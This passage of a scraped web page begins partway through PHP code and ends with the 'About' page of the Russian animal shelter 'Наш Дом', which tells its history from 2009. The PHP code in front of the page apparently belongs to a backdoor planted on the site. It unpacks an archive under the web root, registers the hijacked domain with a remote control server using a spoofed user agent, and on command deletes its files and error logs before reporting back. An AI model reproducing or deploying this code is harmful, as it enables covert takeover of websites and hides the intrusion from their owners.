'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> Наш Дом — приют для животных — О приюте

О приюте

Многие представляют нас по-разному. Сегодня я расскажу вам историю появления приюта "от первого лица".

В далеком 2009 году я была совсем юной девочкой, которая вообще не помышляла ни о какой зоозащите. Да, любила животных, да, порой подбирала кошечку или собачку, искала ей дом "по своим". И вот в один прекрасный день я нечаянно нашла зоозащитный сайт... Ну что я могу? Я девочка без жилья, денег, машины...да вообще без всего. Попросили просто пофоткать. Поехала, пофоткала, не смогла спать, зная, что кот там, а я здесь... Пошли платные передержки, акции, пристройства, поиски. Смогли пристроить. Вот вроде бы и все, но нет, втянулись! Ну как взять домой животное? Опыта то нет, как к своим?....А ладно, понеслась.

Первая собака была из приюта Лилин…. и она умерла….моей истерике не было конца, я никогда, никогда больше не возьму животное… Но нет, утром мне просто всучили собаку, чем и спасли во мне зоозащитника….ну это ладно. Потом год передержки, живодерня…полнейший ахтунг по количеству животных дома и полное понимание, что так больше нельзя. И вот оно решение: надо выселять куда-то зверей, строить небольшой приютик. Наше начало было в пос.Старокамышинск, в 2 сарайчиках заброшенного свинокомплекса. Жили мы там целый год. Тесно, неудобно, бабушки с возмущениями и козами. Надо было что-то решать. И вот самый сложный период: собак много, живодерня заставляет наступать себе на горло и брать-брать-брать…. места нет, периодами было страшно: вплоть до переезда всего приюта раз в сутки, ночевок в гаражах, сожженной бане в саду, да где только не были…. Но в 2011 году мы встретили отличного человека, который помог нам найти землю, к 2012 году мы смогли купить эту землю. И наконец-то у нашего приюта начала появляться своя, домашняя история!

Сначала мы, как и многие приюты, думали нанять рабочих и т.п., но вскоре поняли: бомжи, алкаши и прочие маргинальные личности — это не для нас. Страх за своих животных, опасность пьяных пожаров и т.п. не стоит найма такой рабочей силы, и мы отказались от этого. Решили продолжать делать своими руками. ДА, тяжело ежедневно по 2-3 раза в день ездить в приют, да, тяжело жить без выходных, больничных и праздников,но благодарность за это — счастливые и довольные животные нашего приюта. Начинали мы как простые зоозащитники, сейчас я и мой супруг — руководители большого приюта с душой и историей под названием Наш Дом, мы стараемся претворять в жизнь все новые и новые проекты для улучшения положения животных в нашем городе (стерилизация общественных собак, чипирование,поиск пропавших), с июня 2017 года курируем работу МУП ГорЭкоЦентр (живодерня), стараемся решить проблему с жестоким отловом и убийством там животных (что в целом удается, хоть и не так быстро как хотелось бы).

Сегодня у нас чуть больше 200 животных (217 мосек), огромная, чистая территория с комфортными вольерами, масса идей для развития и, что меня очень радует, приток новых сил в виде замечательных волонтеров (которые в этом году даже отпускали меня в отпуск). Собаки содержатся в комфортных вольерах, с предусмотренным зимником и выгульником, без перенаселения и ущемления их прав, с возможностью дважды в неделю совершать свободные прогулки прямо всей огромной толпой. А еще у нас есть огромный вольер — стариковник. Это дом престарелых для служивших верой и правдой, но преданных на закате жизни собак. Это вольер с отдельным огромным выгульником и сеновалом для максимально комфортной старости наших подопечных. Кошки живут в специально построенном для них домике, с карантинником, летним выгулом, полочками и возможностью уединиться в маленьких котокоробочках. Все животные питаются сухими кормами, консервами и мясом.Каждое животное привито и стерилизовано. Щенки часто проходят социализацию у наших помощников дома, в семьях. Вот такой вот он, приют Наш Дом! Вы с нами?